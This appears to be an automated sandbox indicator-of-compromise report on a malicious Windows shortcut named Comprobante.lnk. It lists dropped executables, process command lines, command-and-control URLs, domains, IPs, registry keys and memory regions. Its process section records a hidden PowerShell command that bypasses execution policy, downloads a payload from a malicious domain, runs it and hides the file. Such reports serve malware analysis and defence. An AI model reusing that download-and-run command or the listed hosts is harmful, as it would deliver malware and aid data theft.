IOC Report
Comprobante.lnk.lnk

loading gif

Files

File Path
Type
Category
Malicious
Comprobante.lnk.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
initial sample
malicious
C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\Desktop\mjtjewi.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mjtjewi.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unwrbiun.5ww.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\188E93\31437F.lck
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\6c132e98e5a06fd825caf0498d9711c3_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3BDBEQO9NFNA05DW626L.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7b78f1e09efa3ae5.customDestinations-ms (copy)
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
malicious
C:\Windows\System32\OpenWith.exe
"C:\Windows\system32\OpenWith.exe"
malicious
C:\Users\user\Desktop\mjtjewi.exe
"C:\Users\user\Desktop\mjtjewi.exe"
malicious
C:\Users\user\Desktop\mjtjewi.exe
C:\Users\user\Desktop\mjtjewi.exe
malicious
C:\Users\user\Desktop\mjtjewi.exe
C:\Users\user\Desktop\mjtjewi.exe
malicious
C:\Users\user\Desktop\mjtjewi.exe
C:\Users\user\Desktop\mjtjewi.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
45.149.241.169
malicious
http://kbfvzoboss.bid/alien/fre.php
malicious
http://alphastand.top/alien/fre.php
malicious
http://alphastand.win/alien/fre.php
malicious
http://alphastand.trade/alien/fre.php
malicious
https://www.sodiumlaurethsulfatedesyroyer.com
unknown
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif
188.114.96.3
malicious
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.sodiumlaurethsulfatedesyroyer.com
unknown
https://go.micro
unknown
http://www.ibsensoftware.com/
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpy
unknown
https://github.com/Pester/Pester
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://microsoft.coF
unknown
https://aka.ms/pscore68
unknown
http://www.microsoft.c
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
freighteighttwocam.ddns.net
45.149.241.169
malicious
www.sodiumlaurethsulfatedesyroyer.com
188.114.96.3
malicious

IPs

IP
Domain
Country
Malicious
188.114.96.3
www.sodiumlaurethsulfatedesyroyer.com
European Union
malicious
45.149.241.169
freighteighttwocam.ddns.net
Germany
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
AC8000
heap
page read and write
malicious
4A28000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
2FD4000
trusted library allocation
page read and write
malicious
2FBA000
trusted library allocation
page read and write
malicious
2F98000
trusted library allocation
page read and write
malicious
2BAD83E000
stack
page read and write
AF1D000
stack
page read and write
1550000
heap
page read and write
20C4CF18000
trusted library allocation
page read and write
177074C0000
heap
page read and write
7FFE7E000000
trusted library allocation
page read and write
7FFE7DF01000
trusted library allocation
page read and write
7FFE7DE70000
trusted library allocation
page execute and read and write
2BAD37D000
stack
page read and write
20C4990E000
heap
page read and write
1530000
trusted library allocation
page read and write
E33E000
stack
page read and write
7FFE7E040000
trusted library allocation
page read and write
13CF000
stack
page read and write
2BAE50D000
stack
page read and write
20C4B300000
heap
page read and write
B70000
unkown
page execute and read and write
20C4CC2A000
trusted library allocation
page read and write
AE1E000
stack
page read and write
BCE000
unkown
page readonly
ACDE000
stack
page read and write
2DE0000
trusted library section
page read and write
20C5BA82000
trusted library allocation
page read and write
102E000
stack
page read and write
7FFE7DE36000
trusted library allocation
page execute and read and write
A70000
heap
page read and write
4A0000
remote allocation
page execute and read and write
2530000
heap
page read and write
44BB58E000
stack
page read and write
2BADABC000
stack
page read and write
C50000
heap
page read and write
17707420000
heap
page read and write
2DBE000
stack
page read and write
C3E000
stack
page read and write
B72000
unkown
page readonly
BC2000
unkown
page execute and read and write
475E000
trusted library allocation
page read and write
20C63988000
heap
page read and write
2C80000
heap
page read and write
20C63AD0000
heap
page read and write
7FFE7DD54000
trusted library allocation
page read and write
11D0000
heap
page read and write
1510000
trusted library allocation
page read and write
20C49A90000
heap
page read and write
7FFE7DFE0000
trusted library allocation
page read and write
B70000
unkown
page readonly
2BAD679000
stack
page read and write
20C638D0000
heap
page read and write
7FFE7DF60000
trusted library allocation
page read and write
54EE000
stack
page read and write
7FFE7E090000
trusted library allocation
page read and write
2BAD4FF000
stack
page read and write
2BAD6BF000
stack
page read and write
7FFE7E080000
trusted library allocation
page read and write
20C63C42000
heap
page read and write
1296000
heap
page read and write
E1FE000
stack
page read and write
14D4000
trusted library allocation
page read and write
14F0000
trusted library allocation
page read and write
7FFE7E0B0000
trusted library allocation
page read and write
2FB5000
trusted library allocation
page read and write
7FFE7DF20000
trusted library allocation
page execute and read and write
7FFE7E050000
trusted library allocation
page read and write
20C4D50A000
trusted library allocation
page read and write
2BAD93F000
stack
page read and write
20C4B380000
trusted library allocation
page read and write
20C49914000
heap
page read and write
BCD0000
trusted library allocation
page read and write
2FF3000
trusted library allocation
page read and write
20C4CEF3000
trusted library allocation
page read and write
20C49A95000
heap
page read and write
11B0000
trusted library allocation
page read and write
2D7C000
stack
page read and write
FD0000
heap
page read and write
E17B000
trusted library section
page read and write
A40000
heap
page read and write
B09E000
stack
page read and write
20C4B580000
heap
page read and write
7FFE7E010000
trusted library allocation
page read and write
20C498AB000
heap
page read and write
2D3E000
stack
page read and write
E30000
heap
page read and write
E186000
trusted library allocation
page read and write
AF50000
trusted library allocation
page execute and read and write
BF0000
heap
page read and write
7FFE7E020000
trusted library allocation
page read and write
B72000
unkown
page execute and read and write
20C63C5C000
heap
page read and write
20C4CEEE000
trusted library allocation
page read and write
2BAD5FD000
stack
page read and write
AA4E000
stack
page read and write
E120000
trusted library section
page read and write
7FFE7DF50000
trusted library allocation
page read and write
284F000
stack
page read and write
20C4CF06000
trusted library allocation
page read and write
3F11000
trusted library allocation
page read and write
17707430000
heap
page read and write
2BAD737000
stack
page read and write
20C639B1000
heap
page read and write
11C3000
trusted library allocation
page execute and read and write
2B3F000
stack
page read and write
1212000
heap
page read and write
20C63938000
heap
page read and write
551C000
trusted library allocation
page read and write
20C4D444000
trusted library allocation
page read and write
E48000
heap
page read and write
4792000
trusted library allocation
page read and write
20C49700000
heap
page read and write
E180000
trusted library allocation
page read and write
2BAD8BE000
stack
page read and write
ABE000
stack
page read and write
2BAD57E000
stack
page read and write
20C63993000
heap
page read and write
7FFE7DFF0000
trusted library allocation
page read and write
20C63BF1000
heap
page read and write
D10000
heap
page read and write
5529000
trusted library allocation
page read and write
CCE000
stack
page read and write
3F15000
trusted library allocation
page read and write
4A0000
remote allocation
page execute and read and write
7FFE7DD52000
trusted library allocation
page read and write
4958000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
14E0000
trusted library allocation
page read and write
8CC000
stack
page read and write
20C4B95C000
trusted library allocation
page read and write
11FB000
heap
page read and write
20C4BB02000
trusted library allocation
page read and write
1160000
heap
page read and write
7FFE7DFB0000
trusted library allocation
page read and write
2BAD27E000
stack
page read and write
20C63AA7000
heap
page execute and read and write
2F11000
trusted library allocation
page read and write
FE0000
heap
page read and write
11F7000
heap
page read and write
7FFE7DE10000
trusted library allocation
page execute and read and write
20C4B3A1000
heap
page read and write
AB4E000
stack
page read and write
20C638F5000
heap
page read and write
7FFE7DF0A000
trusted library allocation
page read and write
123F000
heap
page read and write
20C4B340000
trusted library allocation
page read and write
E18B000
trusted library allocation
page read and write
2850000
heap
page read and write
5530000
trusted library allocation
page read and write
CE8000
heap
page read and write
44BB48C000
stack
page read and write
17708F20000
heap
page read and write
50AD000
stack
page read and write
44BB50E000
stack
page read and write
17708FB4000
heap
page read and write
20C63BC6000
heap
page read and write
25B0000
heap
page read and write
E5FE000
stack
page read and write
BC2000
unkown
page readonly
2BAD9BE000
stack
page read and write
20C63AB0000
heap
page read and write
20C4B395000
heap
page read and write
A75000
heap
page read and write
E1B5000
trusted library allocation
page read and write
11CD000
trusted library allocation
page execute and read and write
7FFE7DFA0000
trusted library allocation
page read and write
2F0E000
stack
page read and write
20C4B2E0000
trusted library allocation
page read and write
11DE000
heap
page read and write
A50000
heap
page read and write
2FF1000
trusted library allocation
page read and write
20C49800000
heap
page read and write
E190000
trusted library allocation
page read and write
5500000
heap
page execute and read and write
2DD0000
heap
page execute and read and write
2E00000
heap
page read and write
7DB000
stack
page read and write
1180000
heap
page read and write
20C638D2000
heap
page read and write
D80000
heap
page read and write
9CD000
stack
page read and write
48BC000
trusted library allocation
page read and write
7FFE7DE0C000
trusted library allocation
page execute and read and write
2BAD838000
stack
page read and write
C70000
heap
page read and write
49C0000
trusted library allocation
page read and write
2B7E000
stack
page read and write
20C63C4C000
heap
page read and write
20C49940000
heap
page read and write
AC90000
trusted library allocation
page execute and read and write
20C498CC000
heap
page read and write
7FFE7DF70000
trusted library allocation
page read and write
7FFE7DF80000
trusted library allocation
page read and write
7FFE7DE00000
trusted library allocation
page read and write
4888000
trusted library allocation
page read and write
7FFE7DFD0000
trusted library allocation
page read and write
20C4B2F0000
heap
page readonly
20C5B93F000
trusted library allocation
page read and write
7FFE7DF40000
trusted library allocation
page execute and read and write
20C49868000
heap
page read and write
17707470000
heap
page read and write
2BACFF5000
stack
page read and write
2BAD47B000
stack
page read and write
7FFE7DF32000
trusted library allocation
page read and write
1520000
trusted library allocation
page execute and read and write
5520000
trusted library allocation
page read and write
AC0000
heap
page read and write
11C0000
trusted library allocation
page read and write
20C4B560000
heap
page execute and read and write
FAF000
stack
page read and write
20C49842000
heap
page read and write
2A3E000
stack
page read and write
E6B000
stack
page read and write
14D0000
trusted library allocation
page read and write
20C4CFC2000
trusted library allocation
page read and write
4FA0000
trusted library section
page read and write
7DF4522C0000
trusted library allocation
page execute and read and write
20C49830000
heap
page read and write
20C49A60000
trusted library allocation
page read and write
ADDD000
stack
page read and write
7FFE7DD6B000
trusted library allocation
page read and write
2BAE48F000
stack
page read and write
D25000
heap
page read and write
6DC000
stack
page read and write
A8C000
stack
page read and write
1205000
heap
page read and write
7FFE7DF10000
trusted library allocation
page execute and read and write
7FFE7DEF0000
trusted library allocation
page read and write
2BAD7B9000
stack
page read and write
5519000
trusted library allocation
page read and write
7FFE7E060000
trusted library allocation
page read and write
20C63C17000
heap
page read and write
7FFE7E070000
trusted library allocation
page read and write
47FD000
trusted library allocation
page read and write
177074C8000
heap
page read and write
20C4B343000
trusted library allocation
page read and write
E1A1000
trusted library allocation
page read and write
C45000
heap
page read and write
20C63C55000
heap
page read and write
20C4D50E000
trusted library allocation
page read and write
11C4000
trusted library allocation
page read and write
20C4C502000
trusted library allocation
page read and write
E2FE000
stack
page read and write
2DF0000
trusted library allocation
page execute and read and write
20C5B8D1000
trusted library allocation
page read and write
14E6000
trusted library allocation
page execute and read and write
D8F000
stack
page read and write
AF9D000
stack
page read and write
2BADA3F000
stack
page read and write
B8D000
stack
page read and write
F68000
stack
page read and write
7FFE7DFC0000
trusted library allocation
page read and write
B0A000
heap
page read and write
7FFE7E0A0000
trusted library allocation
page read and write
C40000
heap
page read and write
20C63936000
heap
page read and write
17708FB0000
heap
page read and write
4F20000
trusted library allocation
page read and write
7FFE7DD53000
trusted library allocation
page execute and read and write
CE0000
heap
page read and write
20C497E0000
heap
page read and write
14F7000
trusted library allocation
page execute and read and write
C30000
heap
page read and write
54F0000
trusted library allocation
page read and write
5540000
heap
page read and write
14CF000
stack
page read and write
2FB3000
trusted library allocation
page read and write
2C90000
heap
page read and write
20C498E6000
heap
page read and write
4F10000
trusted library allocation
page read and write
D20000
heap
page read and write
20C5B8E0000
trusted library allocation
page read and write
12B3000
heap
page read and write
AC8D000
stack
page read and write
11D8000
heap
page read and write
7FFE7E030000
trusted library allocation
page read and write
E6FE000
stack
page read and write
2BAD2FE000
stack
page read and write
115E000
stack
page read and write
14EA000
trusted library allocation
page execute and read and write
14FB000
trusted library allocation
page execute and read and write
1540000
trusted library allocation
page read and write
E40000
heap
page read and write
7FFE7DD5D000
trusted library allocation
page execute and read and write
AB8E000
stack
page read and write
E19E000
trusted library allocation
page read and write
7FFE7DD60000
trusted library allocation
page read and write
20C63C0D000
heap
page read and write
20C63AA0000
heap
page execute and read and write
1045000
heap
page read and write
E4FF000
stack
page read and write
20C4B390000
heap
page read and write
20C498C6000
heap
page read and write
7FFE7DF90000
trusted library allocation
page read and write
1040000
heap
page read and write
20C4B8D1000
trusted library allocation
page read and write
AF9000
heap
page read and write
2BAD3FE000
stack
page read and write
7FFE7DE06000
trusted library allocation
page read and write
7A0E000
stack
page read and write
20C4CF14000
trusted library allocation
page read and write
20C639B8000
heap
page read and write
20C4CF2C000
trusted library allocation
page read and write
2C7F000
stack
page read and write
20C4B4C0000
heap
page execute and read and write
790E000
stack
page read and write
20C63BB0000
heap
page read and write
48F0000
trusted library allocation
page read and write
There are 300 hidden memdumps, click here to show them.